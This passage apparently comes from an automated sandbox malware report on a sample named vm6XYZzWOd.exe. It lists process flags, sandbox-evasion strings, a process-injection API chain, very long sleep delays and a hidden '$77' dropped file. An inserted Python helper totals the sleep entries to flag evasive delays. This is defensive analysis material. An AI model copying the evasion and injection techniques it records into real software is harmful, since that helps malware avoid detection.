                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: vm6XYZzWOd.exe PID: 6772, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: $77Kaxhwswfup.exe PID: 7056, type: MEMORYSTR
                      Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle, 7_2_0000000140001860
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 1DB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 3800000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 1DB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 5E30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 6E30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 7E40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Memory allocated: 8E40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Memory allocated: 1AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Memory allocated: 3590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Memory allocated: 5590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Memory allocated: 5C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Memory allocated: 6C40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                      Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5554
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3172
                      Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 411
                      Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 7203
                      Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 2796
                      Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9976
                      Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9830
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2146
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 723
                      Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_7-8519
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_3-245
                      Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess graph_7-8526
                      Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_7-8464
                      Source: C:\Windows\System32\lsass.exe API coverage: 6.7 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.4 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 6.0 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.4 %
                      Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe TID: 5880 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480 Thread sleep count: 5554 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504 Thread sleep count: 3172 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4440 Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\dllhost.exe TID: 4128 Thread sleep count: 411 > 30
                      Source: C:\Windows\System32\dllhost.exe TID: 4128 Thread sleep time: -41100s >= -30000s
                      Source: C:\Windows\System32\dllhost.exe TID: 4768 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\winlogon.exe TID: 3504 Thread sleep count: 7203 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 3504 Thread sleep time: -7203000s >= -30000s
                      Source: C:\Windows\System32\winlogon.exe TID: 3504 Thread sleep count: 2796 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 3504 Thread sleep time: -2796000s >= -30000s
                      Source: C:\Windows\System32\lsass.exe TID: 2804 Thread sleep count: 9976 > 30
                      Source: C:\Windows\System32\lsass.exe TID: 2804 Thread sleep time: -9976000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4408 Thread sleep count: 246 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 4408 Thread sleep time: -246000s >= -30000s
                      Source: C:\Windows\System32\dwm.exe TID: 3480 Thread sleep count: 9830 > 30
                      Source: C:\Windows\System32\dwm.exe TID: 3480 Thread sleep time: -9830000s >= -30000s
                      Source: C:\Windows\System32\dwm.exe TID: 3480 Thread sleep count: 32 > 30
                      Source: C:\Windows\System32\dwm.exe TID: 3480 Thread sleep time: -32000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep count: 144 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep time: -144000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6112 Thread sleep count: 144 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6112 Thread sleep time: -144000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7164 Thread sleep count: 97 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7164 Thread sleep time: -97000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep count: 95 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep time: -95000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 984 Thread sleep count: 207 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 984 Thread sleep time: -207000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 380 Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 380 Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep count: 74 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep time: -74000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1576 Thread sleep count: 77 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 1576 Thread sleep time: -77000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe TID: 1292 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3116 Thread sleep count: 72 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3116 Thread sleep time: -72000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5800 Thread sleep count: 77 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5800 Thread sleep time: -77000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5308 Thread sleep count: 70 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5308 Thread sleep time: -70000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5364 Thread sleep count: 249 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5364 Thread sleep time: -249000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5408 Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5408 Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2228 Thread sleep count: 249 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 2228 Thread sleep time: -249000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3652 Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3652 Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3924 Thread sleep count: 102 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3924 Thread sleep time: -102000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1816 Thread sleep count: 107 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 1816 Thread sleep time: -107000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6444 Thread sleep count: 60 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6444 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5084 Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5084 Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5068 Thread sleep count: 60 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5068 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6628 Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6628 Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4196 Thread sleep count: 2146 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4196 Thread sleep count: 723 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\spoolsv.exe TID: 6592 Thread sleep count: 94 > 30
                      Source: C:\Windows\System32\spoolsv.exe TID: 6592 Thread sleep time: -94000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5844 Thread sleep count: 51 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5844 Thread sleep time: -51000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6048 Thread sleep count: 54 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6048 Thread sleep time: -54000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5852 Thread sleep count: 50 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5852 Thread sleep time: -50000s >= -30000s
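The per-thread sleep entries above are easier to judge once they are totalled per process. The Python script below is an added triage helper written for this page; it is not part of the Joe Sandbox report and not code from the sample. The lines it parses are constructed from the entries above in the report's "Source: <path> TID: <n> Thread sleep count/time" format, and the family of names (INFINITE_SLEEP, triage) is the script's own. Two points it encodes: the figure 922337203685477 is (2^63 - 1) / 10^4, the largest LARGE_INTEGER relative timeout NtDelayExecution accepts, scaled from 100 ns units to milliseconds, so a thread that passes it never wakes on its own and is flagged separately from the many-short-sleeps pattern; and the "s" suffix the report prints is treated as the sandbox's own unit (411 sleeps in dllhost.exe map to 41100, so it is not seconds), with no conversion attempted. Do not dismiss the system processes in the list: winlogon.exe, lsass.exe, svchost.exe and dwm.exe are the same processes for which the report lists FindFirstFileExW code functions at heap-range addresses, and dllhost.exe carries the VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx chain shown above, so their sleeps are candidate injected-code behaviour rather than idle noise.

```python
"""Added triage helper (not part of the Joe Sandbox report): total the report's
per-thread sleep observations per process so evasive delays stand out."""
import re
from collections import defaultdict

# The report prints NtDelayExecution timeouts as negative relative values.
# (2**63 - 1) // 10_000 == 922337203685477: the largest LARGE_INTEGER timeout
# in 100 ns units, scaled to milliseconds, i.e. a wait that never expires.
INFINITE_SLEEP = (2**63 - 1) // 10_000

# Thresholds quoted by the report itself ("> 30" and ">= -30000s").
# Assumption: the report's "s" suffix is its own unit; no conversion is done.
COUNT_THRESHOLD = 30
TIME_THRESHOLD = 30_000

_LINE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>count|time):\s*-?(?P<value>\d+)s?"
)

# Constructed sample: lines in the report's format, values copied from it.
SLEEP_LINES = """\
Source: C:\\Users\\user\\Desktop\\vm6XYZzWOd.exe TID: 5880 Thread sleep time: -922337203685477s >= -30000s
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 1480 Thread sleep count: 5554 > 30
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 4440 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\\Windows\\System32\\dllhost.exe TID: 4128 Thread sleep count: 411 > 30
Source: C:\\Windows\\System32\\dllhost.exe TID: 4128 Thread sleep time: -41100s >= -30000s
Source: C:\\Windows\\System32\\dllhost.exe TID: 4768 Thread sleep time: -922337203685477s >= -30000s
Source: C:\\Windows\\System32\\svchost.exe TID: 4408 Thread sleep count: 246 > 30
Source: C:\\Windows\\System32\\svchost.exe TID: 4408 Thread sleep time: -246000s >= -30000s
"""


def parse_sleep_lines(text):
    """Yield (process name, tid, kind, value) for every sleep line in text."""
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            proc = m.group("proc").rsplit("\\", 1)[-1]   # drop the directory
            yield proc, int(m.group("tid")), m.group("kind"), int(m.group("value"))


def summarize_sleeps(text):
    """Per process: sleeping threads, sleep count, summed delay, infinite flag."""
    out = defaultdict(lambda: {"threads": set(), "count": 0,
                               "delay": 0, "infinite": False})
    for proc, tid, kind, value in parse_sleep_lines(text):
        entry = out[proc]
        entry["threads"].add(tid)
        if kind == "count":
            entry["count"] += value
        elif value >= INFINITE_SLEEP:
            entry["infinite"] = True      # a wait that never returns on its own
        else:
            entry["delay"] += value
    return dict(out)


def triage(text):
    """Return (process, reason) pairs worth a closer look, infinite sleeps first."""
    findings = []
    for proc, e in summarize_sleeps(text).items():
        if e["infinite"]:
            findings.append((proc, "infinite sleep: stalls past the sandbox window"))
        elif e["count"] > COUNT_THRESHOLD and e["delay"] >= TIME_THRESHOLD:
            findings.append((proc, f"{e['count']} short sleeps totalling {e['delay']}"))
    return sorted(findings, key=lambda f: (not f[1].startswith("infinite"), f[0]))


if __name__ == "__main__":
    for proc, reason in triage(SLEEP_LINES):
        print(f"{proc:20} {reason}")
```

Run it against the full report text to get the same table for every process; the regex accepts both the spaced format above and the run-together form an HTML export produces.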
                      Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\lsass.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\dwm.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (44 occurrences)
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed (2 occurrences)
                      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (6 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e Code function: 6_2_00FDB19B FindFirstFileExW, 6_2_00FDB19B
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094E9E09C FindFirstFileExW, 7_2_000001B094E9E09C
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E85898E09C FindFirstFileExW, 8_2_000001E85898E09C
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE86E09C FindFirstFileExW, 9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000195DD5CE09C FindFirstFileExW, 10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000257E10AE09C FindFirstFileExW, 12_2_00000257E10AE09C
